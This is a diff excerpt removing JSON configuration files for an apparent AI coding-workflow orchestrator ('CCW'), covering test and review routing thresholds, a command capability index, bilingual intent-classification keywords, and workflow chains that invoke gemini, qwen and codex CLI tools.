"to": ["lite-fix", "review-fix"],
|
||||
"condition": "$.pass_rate < 0.95",
|
||||
"extract": {
|
||||
"failures": "$.failures",
|
||||
"error_messages": "$.failures[].message",
|
||||
"affected_files": "$.failures[].file",
|
||||
"suggested_fixes": "$.failures[].suggested_fix"
|
||||
}
|
||||
},
|
||||
"review_to_fix": {
|
||||
"from": ["review-session-cycle", "review-module-cycle"],
|
||||
"to": ["review-fix"],
|
||||
"condition": "$.severity_counts.critical > 0 OR $.severity_counts.high > 3",
|
||||
"extract": {
|
||||
"findings": "$.findings | filter(severity in ['critical', 'high'])",
|
||||
"fix_priority": "$.findings | group_by(category) | sort_by(severity)",
|
||||
"affected_files": "$.findings[].file | unique"
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"completion_criteria": {
|
||||
"plan": {
|
||||
"required": ["has_tasks", "has_files"],
|
||||
"optional": ["has_tests", "no_blocking_risks"],
|
||||
"threshold": 0.8,
|
||||
"routing": {
|
||||
"complete": "proceed_to_execute",
|
||||
"incomplete": "clarify_requirements"
|
||||
}
|
||||
},
|
||||
"execute": {
|
||||
"required": ["all_tasks_attempted", "no_critical_errors"],
|
||||
"optional": ["build_passes", "lint_passes"],
|
||||
"threshold": 1.0,
|
||||
"routing": {
|
||||
"complete": "proceed_to_test_or_review",
|
||||
"partial": "continue_execution",
|
||||
"failed": "diagnose_and_retry"
|
||||
}
|
||||
},
|
||||
"test": {
|
||||
"metrics": {
|
||||
"pass_rate": { "target": 0.95, "minimum": 0.80 },
|
||||
"coverage": { "target": 0.80, "minimum": 0.60 }
|
||||
},
|
||||
"routing": {
|
||||
"pass_rate >= 0.95 AND coverage >= 0.80": "complete",
|
||||
"pass_rate >= 0.95 AND coverage < 0.80": "add_more_tests",
|
||||
"pass_rate >= 0.80": "fix_failures_then_continue",
|
||||
"pass_rate < 0.80": "major_fix_required"
|
||||
}
|
||||
},
|
||||
"review": {
|
||||
"metrics": {
|
||||
"critical_findings": { "target": 0, "maximum": 0 },
|
||||
"high_findings": { "target": 0, "maximum": 3 }
|
||||
},
|
||||
"routing": {
|
||||
"critical == 0 AND high <= 3": "complete_or_optional_fix",
|
||||
"critical > 0": "mandatory_fix",
|
||||
"high > 3": "recommended_fix"
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"flow_decisions": {
|
||||
"_description": "根据产出完成度决定下一步",
|
||||
"patterns": {
|
||||
"plan_execute_test": {
|
||||
"sequence": ["plan", "execute", "test"],
|
||||
"on_test_fail": {
|
||||
"action": "extract_failures_and_fix",
|
||||
"max_iterations": 3,
|
||||
"fallback": "manual_intervention"
|
||||
}
|
||||
},
|
||||
"plan_execute_review": {
|
||||
"sequence": ["plan", "execute", "review"],
|
||||
"on_review_issues": {
|
||||
"action": "prioritize_and_fix",
|
||||
"auto_fix_threshold": "severity < high"
|
||||
}
|
||||
},
|
||||
"iterative_improvement": {
|
||||
"sequence": ["execute", "test", "fix"],
|
||||
"loop_until": "pass_rate >= 0.95 OR iterations >= 3",
|
||||
"on_loop_exit": "report_status"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,127 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.0.0",
|
||||
"generated": "2026-01-03",
|
||||
"description": "CCW command capability index for intelligent workflow coordination"
|
||||
},
|
||||
"capabilities": {
|
||||
"explore": {
|
||||
"description": "Codebase exploration and context gathering",
|
||||
"commands": [
|
||||
{ "command": "/workflow:init", "weight": 1.0, "tags": ["project-setup", "context"] },
|
||||
{ "command": "/workflow:tools:gather", "weight": 0.9, "tags": ["context", "analysis"] },
|
||||
{ "command": "/memory:load", "weight": 0.8, "tags": ["context", "memory"] }
|
||||
],
|
||||
"agents": ["cli-explore-agent", "context-search-agent"]
|
||||
},
|
||||
"brainstorm": {
|
||||
"description": "Multi-perspective analysis and ideation",
|
||||
"commands": [
|
||||
{ "command": "/workflow:brainstorm:auto-parallel", "weight": 1.0, "tags": ["exploration", "multi-role"] },
|
||||
{ "command": "/workflow:brainstorm:artifacts", "weight": 0.9, "tags": ["clarification", "guidance"] },
|
||||
{ "command": "/workflow:brainstorm:synthesis", "weight": 0.8, "tags": ["consolidation", "refinement"] }
|
||||
],
|
||||
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
|
||||
},
|
||||
"plan": {
|
||||
"description": "Task planning and decomposition",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-plan", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "interactive"] },
|
||||
{ "command": "/workflow:plan", "weight": 0.9, "complexity": "medium-high", "tags": ["comprehensive", "persistent"] },
|
||||
{ "command": "/workflow:tdd-plan", "weight": 0.7, "complexity": "medium-high", "tags": ["test-first", "quality"] },
|
||||
{ "command": "/task:create", "weight": 0.6, "tags": ["single-task", "manual"] },
|
||||
{ "command": "/task:breakdown", "weight": 0.5, "tags": ["decomposition", "subtasks"] }
|
||||
],
|
||||
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
|
||||
},
|
||||
"verify": {
|
||||
"description": "Plan and quality verification",
|
||||
"commands": [
|
||||
{ "command": "/workflow:action-plan-verify", "weight": 1.0, "tags": ["plan-quality", "consistency"] },
|
||||
{ "command": "/workflow:tdd-verify", "weight": 0.8, "tags": ["tdd-compliance", "coverage"] }
|
||||
]
|
||||
},
|
||||
"execute": {
|
||||
"description": "Task execution and implementation",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-execute", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "agent-or-cli"] },
|
||||
{ "command": "/workflow:execute", "weight": 0.9, "complexity": "medium-high", "tags": ["dag-parallel", "comprehensive"] },
|
||||
{ "command": "/task:execute", "weight": 0.7, "tags": ["single-task"] }
|
||||
],
|
||||
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
|
||||
},
|
||||
"bugfix": {
|
||||
"description": "Bug diagnosis and fixing",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-fix", "weight": 1.0, "tags": ["diagnosis", "fix", "standard"] },
|
||||
{ "command": "/workflow:lite-fix --hotfix", "weight": 0.9, "tags": ["emergency", "production", "fast"] }
|
||||
],
|
||||
"agents": ["code-developer"]
|
||||
},
|
||||
"test": {
|
||||
"description": "Test generation and execution",
|
||||
"commands": [
|
||||
{ "command": "/workflow:test-gen", "weight": 1.0, "tags": ["post-implementation", "coverage"] },
|
||||
{ "command": "/workflow:test-fix-gen", "weight": 0.9, "tags": ["from-description", "flexible"] },
|
||||
{ "command": "/workflow:test-cycle-execute", "weight": 0.8, "tags": ["iterative", "fix-cycle"] }
|
||||
],
|
||||
"agents": ["test-fix-agent"]
|
||||
},
|
||||
"review": {
|
||||
"description": "Code review and quality analysis",
|
||||
"commands": [
|
||||
{ "command": "/workflow:review-session-cycle", "weight": 1.0, "tags": ["session-based", "comprehensive"] },
|
||||
{ "command": "/workflow:review-module-cycle", "weight": 0.9, "tags": ["module-based", "targeted"] },
|
||||
{ "command": "/workflow:review", "weight": 0.8, "tags": ["single-pass", "type-specific"] },
|
||||
{ "command": "/workflow:review-fix", "weight": 0.7, "tags": ["auto-fix", "findings"] }
|
||||
]
|
||||
},
|
||||
"issue": {
|
||||
"description": "Batch issue management",
|
||||
"commands": [
|
||||
{ "command": "/issue:new", "weight": 1.0, "tags": ["create", "import"] },
|
||||
{ "command": "/issue:discover", "weight": 0.9, "tags": ["find", "analyze"] },
|
||||
{ "command": "/issue:plan", "weight": 0.8, "tags": ["solutions", "planning"] },
|
||||
{ "command": "/issue:queue", "weight": 0.7, "tags": ["prioritize", "order"] },
|
||||
{ "command": "/issue:execute", "weight": 0.6, "tags": ["batch-execute", "dag"] }
|
||||
],
|
||||
"agents": ["issue-plan-agent", "issue-queue-agent"]
|
||||
},
|
||||
"ui-design": {
|
||||
"description": "UI design and prototyping",
|
||||
"commands": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "weight": 1.0, "tags": ["from-scratch", "variants"] },
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "weight": 0.9, "tags": ["reference-based", "copy"] },
|
||||
{ "command": "/workflow:ui-design:design-sync", "weight": 0.7, "tags": ["sync", "finalize"] },
|
||||
{ "command": "/workflow:ui-design:generate", "weight": 0.6, "tags": ["assemble", "prototype"] }
|
||||
],
|
||||
"agents": ["ui-design-agent"]
|
||||
},
|
||||
"memory": {
|
||||
"description": "Documentation and knowledge management",
|
||||
"commands": [
|
||||
{ "command": "/memory:docs", "weight": 1.0, "tags": ["generate", "planning"] },
|
||||
{ "command": "/memory:update-related", "weight": 0.9, "tags": ["incremental", "git-based"] },
|
||||
{ "command": "/memory:update-full", "weight": 0.8, "tags": ["comprehensive", "all-modules"] },
|
||||
{ "command": "/memory:skill-memory", "weight": 0.7, "tags": ["package", "reusable"] }
|
||||
],
|
||||
"agents": ["doc-generator", "memory-bridge"]
|
||||
},
|
||||
"session": {
|
||||
"description": "Workflow session management",
|
||||
"commands": [
|
||||
{ "command": "/workflow:session:start", "weight": 1.0, "tags": ["init", "discover"] },
|
||||
{ "command": "/workflow:session:list", "weight": 0.9, "tags": ["view", "status"] },
|
||||
{ "command": "/workflow:session:resume", "weight": 0.8, "tags": ["continue", "restore"] },
|
||||
{ "command": "/workflow:session:complete", "weight": 0.7, "tags": ["finish", "archive"] }
|
||||
]
|
||||
},
|
||||
"debug": {
|
||||
"description": "Debugging and problem solving",
|
||||
"commands": [
|
||||
{ "command": "/workflow:debug", "weight": 1.0, "tags": ["hypothesis", "iterative"] },
|
||||
{ "command": "/workflow:clean", "weight": 0.6, "tags": ["cleanup", "artifacts"] }
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,136 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.0.0",
|
||||
"description": "Externalized intent classification rules for CCW orchestrator"
|
||||
},
|
||||
"intent_patterns": {
|
||||
"bugfix": {
|
||||
"priority": 1,
|
||||
"description": "Bug修复意图",
|
||||
"variants": {
|
||||
"hotfix": {
|
||||
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
|
||||
"workflow": "lite-fix --hotfix"
|
||||
},
|
||||
"standard": {
|
||||
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "incorrect", "修复", "错误", "崩溃", "失败"],
|
||||
"workflow": "lite-fix"
|
||||
}
|
||||
}
|
||||
},
|
||||
"issue_batch": {
|
||||
"priority": 2,
|
||||
"description": "批量Issue处理意图",
|
||||
"patterns": {
|
||||
"batch_keywords": ["issues", "issue", "batch", "queue", "多个", "批量", "一批"],
|
||||
"action_keywords": ["fix", "resolve", "处理", "解决", "修复"]
|
||||
},
|
||||
"require_both": true,
|
||||
"workflow": "issue:plan → issue:queue → issue:execute"
|
||||
},
|
||||
"exploration": {
|
||||
"priority": 3,
|
||||
"description": "探索/不确定意图",
|
||||
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "should i", "探索", "可能", "或许", "建议"],
|
||||
"workflow": "brainstorm → plan → execute"
|
||||
},
|
||||
"ui_design": {
|
||||
"priority": 4,
|
||||
"description": "UI/设计意图",
|
||||
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局", "前端", "frontend", "页面"],
|
||||
"variants": {
|
||||
"imitate": {
|
||||
"triggers": ["参考", "模仿", "像", "类似", "reference", "like"],
|
||||
"workflow": "ui-design:imitate-auto → plan → execute"
|
||||
},
|
||||
"explore": {
|
||||
"triggers": [],
|
||||
"workflow": "ui-design:explore-auto → plan → execute"
|
||||
}
|
||||
}
|
||||
},
|
||||
"tdd": {
|
||||
"priority": 5,
|
||||
"description": "测试驱动开发意图",
|
||||
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "red-green", "test first"],
|
||||
"workflow": "tdd-plan → execute → tdd-verify"
|
||||
},
|
||||
"review": {
|
||||
"priority": 6,
|
||||
"description": "代码审查意图",
|
||||
"patterns": ["review", "审查", "检查代码", "code review", "质量检查", "安全审查"],
|
||||
"workflow": "review-session-cycle → review-fix"
|
||||
},
|
||||
"documentation": {
|
||||
"priority": 7,
|
||||
"description": "文档生成意图",
|
||||
"patterns": ["文档", "documentation", "docs", "readme", "注释", "api doc", "说明"],
|
||||
"variants": {
|
||||
"incremental": {
|
||||
"triggers": ["更新", "增量", "相关"],
|
||||
"workflow": "memory:update-related"
|
||||
},
|
||||
"full": {
|
||||
"triggers": ["全部", "完整", "所有"],
|
||||
"workflow": "memory:docs → execute"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"complexity_indicators": {
|
||||
"high": {
|
||||
"score_threshold": 4,
|
||||
"patterns": {
|
||||
"architecture": {
|
||||
"keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"],
|
||||
"weight": 2
|
||||
},
|
||||
"multi_module": {
|
||||
"keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"],
|
||||
"weight": 2
|
||||
},
|
||||
"integration": {
|
||||
"keywords": ["integrate", "集成", "connect", "连接", "api", "database", "数据库"],
|
||||
"weight": 1
|
||||
},
|
||||
"quality": {
|
||||
"keywords": ["security", "安全", "performance", "性能", "scale", "扩展", "优化"],
|
||||
"weight": 1
|
||||
}
|
||||
},
|
||||
"workflow": "plan → verify → execute"
|
||||
},
|
||||
"medium": {
|
||||
"score_threshold": 2,
|
||||
"workflow": "lite-plan → lite-execute"
|
||||
},
|
||||
"low": {
|
||||
"score_threshold": 0,
|
||||
"workflow": "lite-plan → lite-execute"
|
||||
}
|
||||
},
|
||||
"cli_tool_triggers": {
|
||||
"gemini": {
|
||||
"explicit": ["用 gemini", "gemini 分析", "让 gemini", "用gemini"],
|
||||
"semantic": ["深度分析", "架构理解", "执行流追踪", "根因分析"]
|
||||
},
|
||||
"qwen": {
|
||||
"explicit": ["用 qwen", "qwen 评估", "让 qwen", "用qwen"],
|
||||
"semantic": ["第二视角", "对比验证", "模式识别"]
|
||||
},
|
||||
"codex": {
|
||||
"explicit": ["用 codex", "codex 实现", "让 codex", "用codex"],
|
||||
"semantic": ["自主完成", "批量修改", "自动实现"]
|
||||
}
|
||||
},
|
||||
"fallback_rules": {
|
||||
"no_match": {
|
||||
"default_workflow": "lite-plan → lite-execute",
|
||||
"use_complexity_assessment": true
|
||||
},
|
||||
"ambiguous": {
|
||||
"action": "ask_user",
|
||||
"message": "检测到多个可能意图,请确认工作流选择"
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,451 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.1.0",
|
||||
"description": "Predefined workflow chains with CLI tool integration for CCW orchestration"
|
||||
},
|
||||
"cli_tools": {
|
||||
"_doc": "CLI工具是CCW的核心能力,在合适时机自动调用以获得:1)较少token获取大量上下文 2)引入不同模型视角 3)增强debug和规划能力",
|
||||
"gemini": {
|
||||
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
|
||||
"triggers": ["分析", "理解", "设计", "架构", "评估", "诊断"],
|
||||
"mode": "analysis",
|
||||
"token_efficiency": "high",
|
||||
"use_when": [
|
||||
"需要理解大型代码库结构",
|
||||
"执行流追踪和数据流分析",
|
||||
"架构设计和技术方案评估",
|
||||
"复杂问题诊断(root cause analysis)"
|
||||
]
|
||||
},
|
||||
"qwen": {
|
||||
"strengths": ["超长上下文", "代码模式识别", "多维度分析"],
|
||||
"triggers": ["评估", "对比", "验证"],
|
||||
"mode": "analysis",
|
||||
"token_efficiency": "high",
|
||||
"use_when": [
|
||||
"Gemini 不可用时作为备选",
|
||||
"需要第二视角验证分析结果",
|
||||
"代码模式识别和重复检测"
|
||||
]
|
||||
},
|
||||
"codex": {
|
||||
"strengths": ["精确代码生成", "自主执行", "数学推理"],
|
||||
"triggers": ["实现", "重构", "修复", "生成", "测试"],
|
||||
"mode": "write",
|
||||
"token_efficiency": "medium",
|
||||
"use_when": [
|
||||
"需要自主完成多步骤代码修改",
|
||||
"复杂重构和迁移任务",
|
||||
"测试生成和修复循环"
|
||||
]
|
||||
}
|
||||
},
|
||||
"cli_injection_rules": {
|
||||
"_doc": "隐式规则:在特定条件下自动注入CLI调用",
|
||||
"context_gathering": {
|
||||
"trigger": "file_read >= 50k chars OR module_count >= 5",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "大量代码上下文使用CLI可节省主会话token"
|
||||
},
|
||||
"pre_planning_analysis": {
|
||||
"trigger": "complexity === 'high' OR intent === 'exploration'",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "复杂任务先用CLI分析获取多模型视角"
|
||||
},
|
||||
"debug_diagnosis": {
|
||||
"trigger": "intent === 'bugfix' AND root_cause_unclear",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "深度诊断利用Gemini的执行流追踪能力"
|
||||
},
|
||||
"code_review": {
|
||||
"trigger": "step === 'review'",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "代码审查用CLI减少token占用"
|
||||
},
|
||||
"implementation": {
|
||||
"trigger": "step === 'execute' AND task_count >= 3",
|
||||
"inject": "codex --mode write",
|
||||
"reason": "多任务执行用Codex自主完成"
|
||||
}
|
||||
},
|
||||
"chains": {
|
||||
"rapid": {
|
||||
"name": "Rapid Iteration",
|
||||
"description": "多模型协作分析 + 直接执行",
|
||||
"complexity": ["low", "medium"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-plan",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
|
||||
"planning_phase": { "tool": "gemini", "mode": "analysis", "trigger": "complexity >= medium" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:lite-execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "user_selects_codex OR complexity >= medium" },
|
||||
"review": { "tool": "gemini", "mode": "analysis", "trigger": "user_selects_review" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 2,
|
||||
"estimated_time": "15-45 min"
|
||||
},
|
||||
"full": {
|
||||
"name": "Full Exploration",
|
||||
"description": "多模型深度分析 + 头脑风暴 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"optional": false,
|
||||
"confirm_before": true,
|
||||
"cli_hint": {
|
||||
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"context_gather": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"task_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 4,
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"coupled": {
|
||||
"name": "Coupled Planning",
|
||||
"description": "CLI深度分析 + 完整规划 + 验证 + 执行",
|
||||
"complexity": ["high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "架构理解和依赖分析" },
|
||||
"conflict_detection": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "自主多任务执行" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:review",
|
||||
"optional": true,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"review": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 4,
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"bugfix": {
|
||||
"name": "Bug Fix",
|
||||
"description": "CLI诊断 + 智能修复",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"standard": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-fix",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "根因分析和执行流追踪" },
|
||||
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"hotfix": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-fix --hotfix",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"quick_diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "timeout": "60s" }
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 1,
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"issue": {
|
||||
"name": "Issue Batch",
|
||||
"description": "CLI批量分析 + 队列优化 + 并行执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/issue:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/issue:queue",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"conflict_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "issue_count >= 3" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/issue:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "DAG并行执行" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 3,
|
||||
"estimated_time": "1-4 hours"
|
||||
},
|
||||
"tdd": {
|
||||
"name": "Test-Driven Development",
|
||||
"description": "TDD规划 + 执行 + CLI验证",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:tdd-plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:tdd-verify",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"coverage_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 3,
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"ui": {
|
||||
"name": "UI-First Development",
|
||||
"description": "UI设计 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"variants": {
|
||||
"explore": {
|
||||
"steps": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
|
||||
]
|
||||
},
|
||||
"imitate": {
|
||||
"steps": [
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 4,
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"review-fix": {
|
||||
"name": "Review and Fix",
|
||||
"description": "CLI多维审查 + 自动修复",
|
||||
"complexity": ["medium"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:review-fix",
|
||||
"optional": true,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 2,
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"docs": {
|
||||
"name": "Documentation",
|
||||
"description": "CLI批量文档生成",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"incremental": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/memory:update-related",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"doc_generation": { "tool": "gemini", "mode": "write", "trigger": "module_count >= 5" }
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"full": {
|
||||
"steps": [
|
||||
{ "command": "/memory:docs", "optional": false, "auto_continue": false },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"batch_doc": { "tool": "gemini", "mode": "write", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 2,
|
||||
"estimated_time": "15-60 min"
|
||||
},
|
||||
"cli-analysis": {
|
||||
"name": "CLI Direct Analysis",
|
||||
"description": "直接CLI分析,获取多模型视角,节省主会话token",
|
||||
"complexity": ["low", "medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "gemini",
|
||||
"mode": "analysis",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"大型代码库快速理解",
|
||||
"执行流追踪和数据流分析",
|
||||
"架构评估和技术方案对比",
|
||||
"性能瓶颈诊断"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "5-15 min"
|
||||
},
|
||||
"cli-implement": {
|
||||
"name": "CLI Direct Implementation",
|
||||
"description": "直接Codex实现,自主完成多步骤任务",
|
||||
"complexity": ["medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "codex",
|
||||
"mode": "write",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"明确需求的功能实现",
|
||||
"代码重构和迁移",
|
||||
"测试生成",
|
||||
"批量代码修改"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "15-60 min"
|
||||
},
|
||||
"cli-debug": {
|
||||
"name": "CLI Debug Session",
|
||||
"description": "CLI调试会话,利用Gemini深度诊断能力",
|
||||
"complexity": ["medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "gemini",
|
||||
"mode": "analysis",
|
||||
"purpose": "hypothesis-driven debugging",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"复杂bug根因分析",
|
||||
"执行流异常追踪",
|
||||
"状态机错误诊断",
|
||||
"并发问题排查"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "10-30 min"
|
||||
}
|
||||
},
|
||||
"chain_selection_rules": {
|
||||
"intent_mapping": {
|
||||
"bugfix": ["bugfix"],
|
||||
"feature_simple": ["rapid"],
|
||||
"feature_unclear": ["full"],
|
||||
"feature_complex": ["coupled"],
|
||||
"issue_batch": ["issue"],
|
||||
"test_driven": ["tdd"],
|
||||
"ui_design": ["ui"],
|
||||
"code_review": ["review-fix"],
|
||||
"documentation": ["docs"],
|
||||
"analysis_only": ["cli-analysis"],
|
||||
"implement_only": ["cli-implement"],
|
||||
"debug": ["cli-debug", "bugfix"]
|
||||
},
|
||||
"complexity_fallback": {
|
||||
"low": "rapid",
|
||||
"medium": "coupled",
|
||||
"high": "full"
|
||||
},
|
||||
"cli_preference_rules": {
|
||||
"_doc": "用户语义触发CLI工具选择",
|
||||
"gemini_triggers": ["用 gemini", "gemini 分析", "让 gemini", "深度分析", "架构理解"],
|
||||
"qwen_triggers": ["用 qwen", "qwen 评估", "让 qwen", "第二视角"],
|
||||
"codex_triggers": ["用 codex", "codex 实现", "让 codex", "自主完成", "批量修改"]
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,218 +0,0 @@
|
||||
# Action: Bugfix Workflow
|
||||
|
||||
